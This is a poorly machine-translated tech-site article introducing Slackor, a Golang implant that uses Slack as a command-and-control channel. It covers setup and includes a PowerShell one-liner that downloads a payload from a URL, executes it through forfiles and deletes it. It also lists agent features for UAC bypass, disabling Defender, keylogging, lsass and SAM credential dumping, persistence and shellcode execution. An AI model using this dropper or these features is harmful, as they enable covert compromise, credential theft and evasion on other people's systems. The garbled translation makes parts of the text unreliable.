Shulou(Shulou.com)05/31 Report--

How to use Slack as your command control server, I believe that many inexperienced people are at a loss about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Slackor

Slackor is a Golang implant that can use Slack as your command control server.

Note: this tool is currently only in the proof-of-concept model stage, please make sure that the application complies with the Slack App developer policy before creating any Slack application.

Tool installation

The Slackor server is developed with Python 3. Before using this tool, you need to meet the following conditions:

1. A Slack workspace

2. Register an App with the following permissions:

Channels:readchannels:historychannels:writefiles:write:userfiles:read

3. Create a BOT

The Slackor project contains five files:

1. Install.sh: install dependency component 2, setup.py: this script can create Slack channel, database and implant 3, agent.py: this script can generate new implant 4, server.py:Slack server, can run 5 on Linux platform, agent.go:Golang implant 6, requirements.txt:Python dependency (automatic installation) quickly start go get github.com/Coalfire-Research/Slackorcd $GOPATH/src/github.com/Coalfire-Research/Slackor

After running the above command, run the "install.sh" file, and then run "setup.py", which requires you to provide the "OAuth access token" and the "Bot User OAuth access token" of the Slack application.

After successfully running the above script, you also need to create the following files in the dist/ directory of the project:

Agent.windows.exe:Windows 64-bit code agent.upx.exe:Windows 64-bit code, UPX encapsulates agent.darwin:macOS 64-bit code agent.32.linux:Linux 32-bit code agent.64.linux:Linux 64-bit code

After running server.py on the Linux host, the tool automatically selects the above agent based on the situation of the target host.

We can use the "stager" module to generate an one-liner or other Dropper:

Powershell.exe iwr [URL]-o C:\ Users\ Public\ [NAME] .exe; forfiles.exe / p c:\ windows\ system32 / msvchost.exe / c C:\ Users\ Public\ [NAME]; timeout 2; delC:\ Users\ Public\ [NAME]. Exe

This command will execute InvokeWebRequest (PS v.3 +) to download Payload and use a LOLBin to execute it. When the execution is complete, Payload will self-destruct. This is just a sample for reference only. You can use other download methods or execution methods according to your needs.

Tool use

Type "help" or press the TAB key to see all the available commands supported by the tool, and we can type "help [COMMAND]" to see the command description.

(Slackor: server side) help-displays the help menu interact- interacts with the agent side list-lists all registered agents remove- terminates or removes agents revive- sends a re-registration signal to all agents stager- generates an One-Liner download and executes the implant quit-exits the program wipefiles- to delete all uploaded files in the Slack

When the contemporary theory is in place, we can interact with it. Use "interact [AGENT]" to switch to the command line interface on the agent side, and then enter "help" or press the TAB key to view all available commands supported by the agent side.

(Slackor: agent side)

Common command back-return to the main menu beacon- modify agent confirmation interval (default is 5 seconds) download- downloads files from the agent to the Slackor server help-display help menu kill-terminate agent sleep- agent hibernation sysinfo- displays the current user, operating system version, System architecture and number of CPU cores upload- uploads a file from the proxy side to the Slackor server wget-get any file through HTTP/HTTPS Windows command bypassuac- generates a highly complete proxy cleanup- removes persistence components clipboard- acquires clipboard contents defanger- attempts to turn off WindowsDefenderduplicate- generation agent copy getsystem- uses NTAUTHORITY/SYSTEM permissions to generate agent keyscan- to turn on keyloggin Minidump- exports lsass.exe memory information and downloads persist- to create a persistence implant in ADS samdump- attempts to export SAM files To extract hash features offline for screenshot- to obtain screenshots shellcode- execute x64 yuan ShellcodeLinux command screenshot- to get screenshots OPSEC

Command output and download files are encrypted with AES, plus Slack's TLS transport layer encryption.

When performing a task that requires writing data to disk, the module sends a reminder to the user. When the Shell command is executed, the cmd.exe/bash will be executed, which may be monitored by the target host. Here are some OPSEC security commands that do not execute cmd.exe/bash.

Cat-print file contents cd-modify directory find-search directory file name getip- to get external IP address (send a DNS request) hostname- display host name ifconfig- display interface information ls-enumerate directory contents mkdir- create a directory pwd-output current working directory rm-remove a file rmdir- remove a directory whoami/ getuid-output current user information read the above Have you learned how to use Slack as your command to control the server? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.